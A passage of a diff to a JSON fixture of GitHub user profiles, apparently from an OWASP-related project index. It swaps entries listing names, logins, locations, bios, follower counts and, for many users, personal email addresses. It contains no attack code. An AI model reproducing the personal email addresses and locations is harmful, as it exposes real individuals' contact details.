"https://avatars.githubusercontent.com/u/2982057?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 6, - "public_gists_count": 1, - "public_repositories_count": 3, - "created_at": "2017-02-27T21:53:10Z", - "updated_at": "2018-12-04T14:12:14Z", - "node_id": "MDQ6VXNlcjI2MDczMDg4", - "bio": "Director of Engineering @nVisium. Aka @forced-request", + "following_count": 12, + "followers_count": 21, + "public_gists_count": 4, + "public_repositories_count": 35, + "created_at": "2012-12-06T16:43:57Z", + "updated_at": "2024-05-17T16:12:12Z", + "node_id": "MDQ6VXNlcjI5ODIwNTc=", + "bio": "Practicing the dark arts of s3curity =-)", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 916, + "pk": 6166, "fields": { - "nest_created_at": "2024-09-11T22:16:28.192Z", - "nest_updated_at": "2024-09-11T22:16:28.192Z", - "name": "Aslan Dukaev", - "login": "dukaev", - "email": "github@dukaev.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6534897?v=4", + "nest_created_at": "2024-09-22T06:46:13.529Z", + "nest_updated_at": "2024-09-22T18:32:47.517Z", + "name": "", + "login": "horvatic", + "email": "sbhorvatic@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/18469499?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 18, - "followers_count": 50, - "public_gists_count": 8, - "public_repositories_count": 25, - "created_at": "2014-01-29T13:15:50Z", - "updated_at": "2024-09-07T15:41:23Z", - "node_id": "MDQ6VXNlcjY1MzQ4OTc=", - "bio": "Developer and Hacker", + "following_count": 7, + "followers_count": 10, + "public_gists_count": 1, + "public_repositories_count": 54, + "created_at": "2016-04-14T18:21:39Z", + "updated_at": "2024-08-01T18:03:59Z", + "node_id": "MDQ6VXNlcjE4NDY5NDk5", + "bio": "", "is_hireable": true, - "twitter_username": "adukv" + "twitter_username": "" } }, { "model": "github.user", - "pk": 917, + "pk": 6167, "fields": { - "nest_created_at": "2024-09-11T22:16:29.056Z", - "nest_updated_at": "2024-09-11T22:16:29.056Z", - "name": "Joel Brewer", - "login": "joelbrewer", - "email": "joel@brewerdigital.com", - "avatar_url": "https://avatars.githubusercontent.com/u/2348386?v=4", - "company": "Brewer Digital", - "location": "Colorado", + "nest_created_at": "2024-09-22T06:46:13.845Z", + "nest_updated_at": "2024-09-22T18:32:47.828Z", + "name": "Paul Deardorff", + "login": "themetric", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1435186?v=4", + "company": "", + "location": "Berkeley, CA", "collaborators_count": 0, - "following_count": 36, - "followers_count": 16, - "public_gists_count": 78, + "following_count": 55, + "followers_count": 22, + "public_gists_count": 3, "public_repositories_count": 36, - "created_at": "2012-09-14T17:47:42Z", - "updated_at": "2024-09-09T00:14:48Z", - "node_id": "MDQ6VXNlcjIzNDgzODY=", + "created_at": "2012-02-14T00:50:51Z", + "updated_at": "2024-09-12T21:27:37Z", + "node_id": "MDQ6VXNlcjE0MzUxODY=", "bio": "", "is_hireable": true, "twitter_username": "" @@ -383178,24 +640102,49 @@ }, { "model": "github.user", - "pk": 918, + "pk": 6168, "fields": { - "nest_created_at": "2024-09-11T22:16:29.884Z", - "nest_updated_at": "2024-09-11T22:16:29.884Z", - "name": "Daigham", - "login": "Daigham", + "nest_created_at": "2024-09-22T06:46:14.176Z", + "nest_updated_at": "2024-09-22T18:32:48.170Z", + "name": "@tkmru", + "login": "tkmru", + "email": "i.am.tkmru+work@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1628214?v=4", + "company": "", + "location": "Japan", + "collaborators_count": 0, + "following_count": 82, + "followers_count": 242, + "public_gists_count": 94, + "public_repositories_count": 99, + "created_at": "2012-04-10T06:28:26Z", + "updated_at": "2024-07-29T06:02:27Z", + "node_id": "MDQ6VXNlcjE2MjgyMTQ=", + "bio": "電脳ケロちゃん / Co-Founder & CTO of Sterra Security Co.,Ltd. / Black Hat EUROPE 2021-2022 Arsenal / Black Hat USA 2020-2021 Arsenal / Metasploit GSoC 2017", + "is_hireable": false, + "twitter_username": "tkmru" + } +}, +{ + "model": "github.user", + "pk": 6169, + "fields": { + "nest_created_at": "2024-09-22T06:46:29.856Z", + "nest_updated_at": "2024-09-22T19:29:38.855Z", + "name": "Benjamin Kellermann", + "login": "kellerben", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20999399?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5689316?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 21, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-08-12T21:30:08Z", - "updated_at": "2022-05-11T14:03:03Z", - "node_id": "MDQ6VXNlcjIwOTk5Mzk5", + "public_repositories_count": 16, + "created_at": "2013-10-15T08:18:03Z", + "updated_at": "2024-08-30T07:52:07Z", + "node_id": "MDQ6VXNlcjU2ODkzMTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383203,99 +640152,99 @@ }, { "model": "github.user", - "pk": 919, + "pk": 6170, "fields": { - "nest_created_at": "2024-09-11T22:16:30.768Z", - "nest_updated_at": "2024-09-13T04:56:22.455Z", - "name": "Pranesh", - "login": "pmedilall", - "email": "pmedilall@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/4945275?v=4", + "nest_created_at": "2024-09-22T06:46:30.833Z", + "nest_updated_at": "2024-09-22T19:29:39.815Z", + "name": "Sho Matsumoto", + "login": "mtmtcode", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1799271?v=4", "company": "", - "location": "Sydney Australia", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2013-07-05T02:56:50Z", - "updated_at": "2023-04-24T02:30:43Z", - "node_id": "MDQ6VXNlcjQ5NDUyNzU=", + "following_count": 9, + "followers_count": 17, + "public_gists_count": 12, + "public_repositories_count": 36, + "created_at": "2012-05-31T14:35:32Z", + "updated_at": "2024-08-14T01:06:27Z", + "node_id": "MDQ6VXNlcjE3OTkyNzE=", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 920, + "pk": 6171, "fields": { - "nest_created_at": "2024-09-11T22:16:38.996Z", - "nest_updated_at": "2024-09-12T03:10:13.989Z", - "name": "Simon Bennetts", - "login": "psiinon", - "email": "psiinon@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1081115?v=4", + "nest_created_at": "2024-09-22T06:46:31.154Z", + "nest_updated_at": "2024-09-22T19:29:40.124Z", + "name": "", + "login": "uhei", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2116845?v=4", "company": "", - "location": "Online", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 621, - "public_gists_count": 0, - "public_repositories_count": 114, - "created_at": "2011-09-26T15:44:35Z", - "updated_at": "2024-07-16T09:54:56Z", - "node_id": "MDQ6VXNlcjEwODExMTU=", - "bio": "@zaproxy project lead.", + "following_count": 0, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 21, + "created_at": "2012-08-08T13:15:32Z", + "updated_at": "2024-09-13T20:39:46Z", + "node_id": "MDQ6VXNlcjIxMTY4NDU=", + "bio": "", "is_hireable": false, - "twitter_username": "psiinon" + "twitter_username": "" } }, { "model": "github.user", - "pk": 921, + "pk": 6172, "fields": { - "nest_created_at": "2024-09-11T22:16:41.502Z", - "nest_updated_at": "2024-09-11T22:16:42.328Z", - "name": "IriusRisk", - "login": "iriusrisk", - "email": "info@iriusrisk.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1478907?v=4", + "nest_created_at": "2024-09-22T06:46:31.493Z", + "nest_updated_at": "2024-09-22T19:29:40.442Z", + "name": "Drew Schatt", + "login": "schatt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/376509?v=4", "company": "", - "location": "Spain", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 40, - "public_gists_count": 0, - "public_repositories_count": 34, - "created_at": "2012-02-27T16:17:56Z", - "updated_at": "2024-08-21T15:11:31Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjE0Nzg5MDc=", + "following_count": 1, + "followers_count": 0, + "public_gists_count": 4, + "public_repositories_count": 209, + "created_at": "2010-08-26T05:58:30Z", + "updated_at": "2024-06-11T17:09:50Z", + "node_id": "MDQ6VXNlcjM3NjUwOQ==", "bio": "", "is_hireable": false, - "twitter_username": "iriusrisk" + "twitter_username": "" } }, { "model": "github.user", - "pk": 922, + "pk": 6173, "fields": { - "nest_created_at": "2024-09-11T22:16:50.759Z", - "nest_updated_at": "2024-09-11T22:16:50.759Z", - "name": "Jasper Wallace", - "login": "JasperWallace", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/634653?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T06:46:39.354Z", + "nest_updated_at": "2024-09-22T18:33:12.315Z", + "name": "Sal Scotto", + "login": "washu", + "email": "sal.scotto@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/588324?v=4", + "company": "Aztec Software", + "location": "Smithfield, NC", "collaborators_count": 0, - "following_count": 16, - "followers_count": 17, - "public_gists_count": 2, - "public_repositories_count": 26, - "created_at": "2011-02-23T20:08:07Z", - "updated_at": "2022-12-07T00:32:23Z", - "node_id": "MDQ6VXNlcjYzNDY1Mw==", + "following_count": 2, + "followers_count": 23, + "public_gists_count": 37, + "public_repositories_count": 245, + "created_at": "2011-01-28T13:03:37Z", + "updated_at": "2024-08-29T18:18:49Z", + "node_id": "MDQ6VXNlcjU4ODMyNA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383303,24 +640252,24 @@ }, { "model": "github.user", - "pk": 923, + "pk": 6174, "fields": { - "nest_created_at": "2024-09-11T22:16:52.055Z", - "nest_updated_at": "2024-09-12T00:25:24.273Z", - "name": "Elger Jonker", - "login": "stitch", + "nest_created_at": "2024-09-22T06:46:47.482Z", + "nest_updated_at": "2024-09-22T18:33:20.453Z", + "name": "bernardo", + "login": "bernardoaraujor", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/333846?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9698228?v=4", "company": "", - "location": "Netherlands", + "location": "Brazil", "collaborators_count": 0, - "following_count": 6, - "followers_count": 10, - "public_gists_count": 0, - "public_repositories_count": 27, - "created_at": "2010-07-16T08:55:59Z", - "updated_at": "2024-04-21T14:46:50Z", - "node_id": "MDQ6VXNlcjMzMzg0Ng==", + "following_count": 169, + "followers_count": 73, + "public_gists_count": 11, + "public_repositories_count": 53, + "created_at": "2014-11-12T15:52:58Z", + "updated_at": "2024-09-10T12:18:57Z", + "node_id": "MDQ6VXNlcjk2OTgyMjg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383328,24 +640277,24 @@ }, { "model": "github.user", - "pk": 924, + "pk": 6175, "fields": { - "nest_created_at": "2024-09-11T22:16:53.309Z", - "nest_updated_at": "2024-09-11T22:16:53.309Z", - "name": "", - "login": "reijin90", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6883646?v=4", + "nest_created_at": "2024-09-22T06:46:47.807Z", + "nest_updated_at": "2024-09-22T18:33:20.769Z", + "name": "Alexander Bryan", + "login": "apbryan", + "email": "abryancs@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6394703?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 2, - "public_gists_count": 1, - "public_repositories_count": 15, - "created_at": "2014-03-07T13:13:55Z", - "updated_at": "2024-08-10T22:53:10Z", - "node_id": "MDQ6VXNlcjY4ODM2NDY=", + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-01-14T00:08:28Z", + "updated_at": "2024-01-19T06:50:38Z", + "node_id": "MDQ6VXNlcjYzOTQ3MDM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383353,24 +640302,24 @@ }, { "model": "github.user", - "pk": 925, + "pk": 6176, "fields": { - "nest_created_at": "2024-09-11T22:16:54.572Z", - "nest_updated_at": "2024-09-16T21:08:07.876Z", - "name": "Gustav", - "login": "kylak", - "email": "gustav7777777@icloud.com", - "avatar_url": "https://avatars.githubusercontent.com/u/16438248?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T06:46:48.128Z", + "nest_updated_at": "2024-09-22T18:33:21.084Z", + "name": "Yang Ou", + "login": "ouyanguf", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5349388?v=4", + "company": "Amazon Web Services", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 23, - "followers_count": 5, - "public_gists_count": 7, - "public_repositories_count": 42, - "created_at": "2015-12-25T17:23:56Z", - "updated_at": "2024-09-04T09:35:09Z", - "node_id": "MDQ6VXNlcjE2NDM4MjQ4", + "following_count": 3, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2013-08-30T19:51:47Z", + "updated_at": "2024-09-18T19:02:05Z", + "node_id": "MDQ6VXNlcjUzNDkzODg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383378,24 +640327,24 @@ }, { "model": "github.user", - "pk": 926, + "pk": 6177, "fields": { - "nest_created_at": "2024-09-11T22:16:55.919Z", - "nest_updated_at": "2024-09-18T18:23:28.690Z", - "name": "EnDe", - "login": "EnDe", - "email": "viele@public-files.de", - "avatar_url": "https://avatars.githubusercontent.com/u/103866?v=4", + "nest_created_at": "2024-09-22T06:46:48.460Z", + "nest_updated_at": "2024-09-22T18:33:21.401Z", + "name": "", + "login": "ngarg333", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6386531?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 101, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2009-07-11T10:49:01Z", - "updated_at": "2024-06-24T20:14:42Z", - "node_id": "MDQ6VXNlcjEwMzg2Ng==", + "public_repositories_count": 2, + "created_at": "2014-01-13T04:55:17Z", + "updated_at": "2017-02-22T05:08:45Z", + "node_id": "MDQ6VXNlcjYzODY1MzE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383403,174 +640352,174 @@ }, { "model": "github.user", - "pk": 927, + "pk": 6178, "fields": { - "nest_created_at": "2024-09-11T22:32:32.254Z", - "nest_updated_at": "2024-09-18T18:28:01.560Z", - "name": "RedRays", - "login": "redrays-io", - "email": "support@redrays.io", - "avatar_url": "https://avatars.githubusercontent.com/u/89958617?v=4", - "company": "", - "location": "United States of America", + "nest_created_at": "2024-09-22T06:46:49.101Z", + "nest_updated_at": "2024-09-22T18:33:22.065Z", + "name": "Pedro hates github.com", + "login": "pedro-nonfree", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39959198?v=4", + "company": "Humanity", + "location": "As far as possible from Microsoft", "collaborators_count": 0, "following_count": 0, - "followers_count": 11, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2021-09-02T04:07:24Z", - "updated_at": "2024-05-27T05:52:06Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjg5OTU4NjE3", - "bio": "RedRays Security Platform", + "public_repositories_count": 40, + "created_at": "2018-06-05T14:38:26Z", + "updated_at": "2024-09-13T14:48:01Z", + "node_id": "MDQ6VXNlcjM5OTU5MTk4", + "bio": "Coding like in prison. Github was non-free, but now is owned by Microsoft. GitHub also blocks people living near USA sanctioned zones.Too much for this poor boy", "is_hireable": false, - "twitter_username": "redraysio" + "twitter_username": "" } }, { "model": "github.user", - "pk": 928, + "pk": 6179, "fields": { - "nest_created_at": "2024-09-11T22:32:36.054Z", - "nest_updated_at": "2024-09-18T18:52:19.078Z", - "name": "OWASP Noir", - "login": "owasp-noir", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/150104587?v=4", + "nest_created_at": "2024-09-22T06:46:53.201Z", + "nest_updated_at": "2024-09-22T18:33:26.004Z", + "name": "Roberto Haddock Lobo", + "login": "rhlobo", + "email": "rhlobo+github@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1222130?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 13, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2023-11-07T03:50:35Z", - "updated_at": "2024-06-21T04:02:41Z", - "node_id": "O_kgDOCPJqCw", - "bio": "OWASP Noir is an open-source project, specializing in identifying attack surfaces for enhanced whitebox security testing and security pipeline.", + "followers_count": 12, + "public_gists_count": 1, + "public_repositories_count": 31, + "created_at": "2011-11-26T16:38:59Z", + "updated_at": "2024-06-15T17:34:45Z", + "node_id": "MDQ6VXNlcjEyMjIxMzA=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 929, + "pk": 6180, "fields": { - "nest_created_at": "2024-09-11T22:32:55.279Z", - "nest_updated_at": "2024-09-18T19:13:16.980Z", - "name": "HAHWUL", - "login": "hahwul", - "email": "hahwul@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/13212227?v=4", + "nest_created_at": "2024-09-22T06:46:57.280Z", + "nest_updated_at": "2024-09-22T18:33:29.940Z", + "name": "Peter Wu", + "login": "Lekensteyn", + "email": "peter@lekensteyn.nl", + "avatar_url": "https://avatars.githubusercontent.com/u/164530?v=4", "company": "", - "location": "Republic of Korea (South)", + "location": "The Netherlands", "collaborators_count": 0, - "following_count": 60, - "followers_count": 2377, - "public_gists_count": 27, - "public_repositories_count": 143, - "created_at": "2015-07-07T03:24:23Z", - "updated_at": "2024-09-02T12:16:11Z", - "node_id": "MDQ6VXNlcjEzMjEyMjI3", - "bio": "Offensive Security Engineer, Rubyist/Crystalist/Gopher and H4cker", + "following_count": 4, + "followers_count": 316, + "public_gists_count": 23, + "public_repositories_count": 176, + "created_at": "2009-12-08T17:30:01Z", + "updated_at": "2024-09-20T11:09:12Z", + "node_id": "MDQ6VXNlcjE2NDUzMA==", + "bio": "", "is_hireable": false, - "twitter_username": "hahwul" + "twitter_username": "Lekensteyn" } }, { "model": "github.user", - "pk": 930, + "pk": 6181, "fields": { - "nest_created_at": "2024-09-11T22:32:57.517Z", - "nest_updated_at": "2024-09-18T18:28:22.029Z", - "name": "KSG", - "login": "ksg97031", - "email": "ksg97031@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6715194?v=4", + "nest_created_at": "2024-09-22T06:46:57.603Z", + "nest_updated_at": "2024-09-22T18:33:30.247Z", + "name": "Frank Cornelis", + "login": "fcorneli", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/771606?v=4", "company": "", - "location": "Republic of Korea", + "location": "", "collaborators_count": 0, - "following_count": 39, - "followers_count": 44, - "public_gists_count": 9, - "public_repositories_count": 89, - "created_at": "2014-02-18T11:45:45Z", - "updated_at": "2024-09-16T15:52:30Z", - "node_id": "MDQ6VXNlcjY3MTUxOTQ=", - "bio": "Security, Coding, Open Source", - "is_hireable": true, + "following_count": 1, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2011-05-06T05:53:41Z", + "updated_at": "2024-03-05T11:36:28Z", + "node_id": "MDQ6VXNlcjc3MTYwNg==", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 931, + "pk": 6182, "fields": { - "nest_created_at": "2024-09-11T22:33:53.289Z", - "nest_updated_at": "2024-09-18T18:52:26.822Z", - "name": "L3montree", - "login": "l3montree-dev", - "email": "info@l3montree.com", - "avatar_url": "https://avatars.githubusercontent.com/u/101948992?v=4", + "nest_created_at": "2024-09-22T06:46:57.930Z", + "nest_updated_at": "2024-09-22T18:33:30.556Z", + "name": "Jérémy Lebourdais", + "login": "Master-jim", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3841234?v=4", "company": "", - "location": "Bonn", + "location": "France", "collaborators_count": 0, "following_count": 0, - "followers_count": 5, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2022-03-19T19:44:56Z", - "updated_at": "2024-05-18T13:11:40Z", - "node_id": "O_kgDOBhOeQA", - "bio": "DevSecOps made in Germany. Securing your Software Supply Chain and Cloud-Native Environment.", + "public_repositories_count": 1, + "created_at": "2013-03-12T10:09:09Z", + "updated_at": "2019-05-10T11:58:21Z", + "node_id": "MDQ6VXNlcjM4NDEyMzQ=", + "bio": "", "is_hireable": false, - "twitter_username": "l_3_montree" + "twitter_username": "" } }, { "model": "github.user", - "pk": 932, + "pk": 6183, "fields": { - "nest_created_at": "2024-09-11T22:33:56.694Z", - "nest_updated_at": "2024-09-11T22:35:00.057Z", - "name": "Tim Bastin", - "login": "timbastin", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38261809?v=4", - "company": "L3montree Cybersecurity", - "location": "Bonn", + "nest_created_at": "2024-09-22T06:46:58.245Z", + "nest_updated_at": "2024-09-22T18:33:30.880Z", + "name": "Pedro Pinheiro", + "login": "pmop", + "email": "pmop@protonmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8449810?v=4", + "company": "", + "location": "Brazil", "collaborators_count": 0, - "following_count": 8, - "followers_count": 16, - "public_gists_count": 10, - "public_repositories_count": 0, - "created_at": "2018-04-10T18:58:46Z", - "updated_at": "2024-09-06T12:40:30Z", - "node_id": "MDQ6VXNlcjM4MjYxODA5", - "bio": "https://gitlab.com/timbastin", - "is_hireable": false, + "following_count": 29, + "followers_count": 21, + "public_gists_count": 4, + "public_repositories_count": 24, + "created_at": "2014-08-14T14:55:03Z", + "updated_at": "2024-08-23T16:56:13Z", + "node_id": "MDQ6VXNlcjg0NDk4MTA=", + "bio": "Software Engineer", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 933, + "pk": 6184, "fields": { - "nest_created_at": "2024-09-11T22:34:14.577Z", - "nest_updated_at": "2024-09-11T22:34:55.277Z", - "name": "Sebastian Kawelke", - "login": "seb-kw", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/66557440?v=4", - "company": "L3montree", - "location": "Germany", + "nest_created_at": "2024-09-22T06:46:58.886Z", + "nest_updated_at": "2024-09-22T18:33:31.503Z", + "name": "Kevin VanDenBreemen", + "login": "kevinvandenbreemen", + "email": "kevin.vandenbreemen+github@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17735651?v=4", + "company": "Pelmorex Media Inc.", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, + "following_count": 36, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2020-06-07T12:39:31Z", - "updated_at": "2024-09-05T10:58:46Z", - "node_id": "MDQ6VXNlcjY2NTU3NDQw", + "public_repositories_count": 98, + "created_at": "2016-03-09T03:07:59Z", + "updated_at": "2024-06-11T21:36:09Z", + "node_id": "MDQ6VXNlcjE3NzM1NjUx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383578,49 +640527,49 @@ }, { "model": "github.user", - "pk": 934, + "pk": 6185, "fields": { - "nest_created_at": "2024-09-11T22:34:41.534Z", - "nest_updated_at": "2024-09-18T18:52:29.698Z", - "name": "", - "login": "Refoo0", + "nest_created_at": "2024-09-22T06:46:59.203Z", + "nest_updated_at": "2024-09-22T18:33:31.818Z", + "name": "Martin HS", + "login": "holiman", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/148266382?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/142290?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-10-17T17:37:31Z", - "updated_at": "2024-09-06T07:32:19Z", - "node_id": "U_kgDOCNZdjg", + "following_count": 2, + "followers_count": 1101, + "public_gists_count": 30, + "public_repositories_count": 113, + "created_at": "2009-10-20T19:14:18Z", + "updated_at": "2024-01-20T18:08:46Z", + "node_id": "MDQ6VXNlcjE0MjI5MA==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 935, + "pk": 6186, "fields": { - "nest_created_at": "2024-09-11T22:35:01.746Z", - "nest_updated_at": "2024-09-11T22:35:03.491Z", + "nest_created_at": "2024-09-22T06:46:59.518Z", + "nest_updated_at": "2024-09-22T18:33:32.134Z", "name": "", - "login": "devguard-app[bot]", + "login": "spixi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/in/923505?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3192596?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-06-17T13:44:12Z", - "updated_at": "2024-07-07T12:21:47Z", - "node_id": "BOT_kgDOClDUwA", + "following_count": 3, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2013-01-05T12:01:46Z", + "updated_at": "2024-09-18T07:02:25Z", + "node_id": "MDQ6VXNlcjMxOTI1OTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383628,149 +640577,149 @@ }, { "model": "github.user", - "pk": 936, + "pk": 6187, "fields": { - "nest_created_at": "2024-09-11T22:35:33.341Z", - "nest_updated_at": "2024-09-18T18:52:31.446Z", - "name": "OWASP Common Lifecycle Enumeration (CLE)", - "login": "Common-Lifecycle-Enumeration", + "nest_created_at": "2024-09-22T07:35:58.407Z", + "nest_updated_at": "2024-09-22T18:38:28.836Z", + "name": "Dyrandy", + "login": "Dyrandy", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/102492483?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/53304159?v=4", "company": "", - "location": "", + "location": "South Korea", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, + "following_count": 15, + "followers_count": 17, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-03-28T00:00:32Z", - "updated_at": "2024-01-30T17:20:23Z", - "node_id": "O_kgDOBhvpQw", - "bio": "Open standard supporting software component aliasing, component lifecycle changes such as end-of-life and end-of-support, and provenance chaining over time.", + "public_repositories_count": 22, + "created_at": "2019-07-25T12:57:19Z", + "updated_at": "2024-09-02T06:40:45Z", + "node_id": "MDQ6VXNlcjUzMzA0MTU5", + "bio": "Computer Guy ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "dyrandy5" } }, { "model": "github.user", - "pk": 937, + "pk": 6188, "fields": { - "nest_created_at": "2024-09-11T22:35:37.300Z", - "nest_updated_at": "2024-09-18T18:52:34.764Z", - "name": "OWASP ModSecurity", - "login": "owasp-modsecurity", - "email": "modsecurity@owasp.org", - "avatar_url": "https://avatars.githubusercontent.com/u/157431874?v=4", + "nest_created_at": "2024-09-22T07:36:16.255Z", + "nest_updated_at": "2024-09-22T18:38:46.610Z", + "name": "Christopher Karg", + "login": "CMaxK", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71667581?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 73, + "following_count": 1, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2024-01-22T23:43:12Z", - "updated_at": "2024-09-01T11:32:49Z", - "node_id": "O_kgDOCWI4Qg", - "bio": "ModSecurity - Open source WAF", + "public_repositories_count": 27, + "created_at": "2020-09-21T19:15:15Z", + "updated_at": "2024-08-20T14:14:06Z", + "node_id": "MDQ6VXNlcjcxNjY3NTgx", + "bio": "", "is_hireable": false, - "twitter_username": "ModSecurity" + "twitter_username": "" } }, { "model": "github.user", - "pk": 938, + "pk": 6189, "fields": { - "nest_created_at": "2024-09-11T22:35:41.433Z", - "nest_updated_at": "2024-09-13T05:23:38.305Z", - "name": "Ryan Barnett", - "login": "rcbarnett-zz", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/621352?v=4", - "company": "Akamai Threat Research Team", - "location": "", + "nest_created_at": "2024-09-22T07:36:16.574Z", + "nest_updated_at": "2024-09-22T18:38:46.928Z", + "name": "Jonas Fassbender", + "login": "jofas", + "email": "jonas@fassbender.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/20799702?v=4", + "company": "fassbender.dev", + "location": "Europe", "collaborators_count": 0, - "following_count": 1, - "followers_count": 31, - "public_gists_count": 5, - "public_repositories_count": 4, - "created_at": "2011-02-16T15:00:52Z", - "updated_at": "2020-04-23T23:53:28Z", - "node_id": "MDQ6VXNlcjYyMTM1Mg==", - "bio": "", + "following_count": 9, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 81, + "created_at": "2016-08-02T17:11:58Z", + "updated_at": "2024-08-14T02:39:52Z", + "node_id": "MDQ6VXNlcjIwNzk5NzAy", + "bio": "Freelancing Software Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 939, + "pk": 6190, "fields": { - "nest_created_at": "2024-09-11T22:35:41.832Z", - "nest_updated_at": "2024-09-13T05:23:38.619Z", - "name": "Felipe Zimmerle", - "login": "zimmerle", - "email": "felipe@felipe.wtf", - "avatar_url": "https://avatars.githubusercontent.com/u/428268?v=4", - "company": "", - "location": "Ontario, Canada", + "nest_created_at": "2024-09-22T07:36:32.765Z", + "nest_updated_at": "2024-09-22T18:39:03.891Z", + "name": "Breno Silva", + "login": "brenosilva", + "email": "breno.silva@ui.com", + "avatar_url": "https://avatars.githubusercontent.com/u/596891?v=4", + "company": "Ubiquiti", + "location": "Brazil", "collaborators_count": 0, - "following_count": 65, - "followers_count": 308, - "public_gists_count": 41, - "public_repositories_count": 63, - "created_at": "2010-10-05T16:53:59Z", - "updated_at": "2024-08-14T02:31:53Z", - "node_id": "MDQ6VXNlcjQyODI2OA==", - "bio": 